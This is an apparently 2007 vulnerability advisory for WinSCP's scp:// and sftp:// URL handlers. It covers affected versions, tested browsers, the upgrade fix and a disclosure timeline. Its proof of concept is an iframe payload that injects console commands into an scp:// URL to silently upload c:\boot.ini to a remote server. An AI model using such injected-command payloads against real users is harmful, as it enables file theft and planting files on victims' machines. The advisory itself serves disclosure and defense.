WinSCP < 4.04 url protocol handler flaw
-Affected products: WinSCP 4.03 and older
-Details:
By default WinSCP installs url protocol handlers for the scp:// and sftp://
protocols.
These could be used by malicious web content to automatically upload any file
from the local system to a remote server, or automatically download files from
a remote server to the local system.
Since version 3.8.2 there is a sort of protection against this, but this does
not stop all forms of attack.
-PoC:
On a machine you control set up an scp-only account with the username "scp"
with any password.
Place this on a website:
<iframe src='scp:password@xxxxxxxxxxxx:" /console /command "option confirm off"
"put c:\boot.ini" close exit "'/>
This will upload a file to the server when the page is visited by a user with a
vulnerable WinSCP installed.
Downloading a file from the server to any location writable by the current user
also works.
-Tested on:
IE6 & IE7 works.
FF older than 2.0.0.5 works.
FF 2.0.0.5 and newer show a confirmation dialog before executing WinSCP.
-Solution
Upgrade to version 4.04 or higher from http://winscp.net/download.php
-Timeline
24-Jul-2007 Vulnerability reported to Martin Prikryl
25-07-2007 Proposed fix to Martin
31-07-2007 Response from Martin
01-09-2007 Martin confirms fix
02-09-2007 New version done
06-09-2007 WinSCP v4.04 released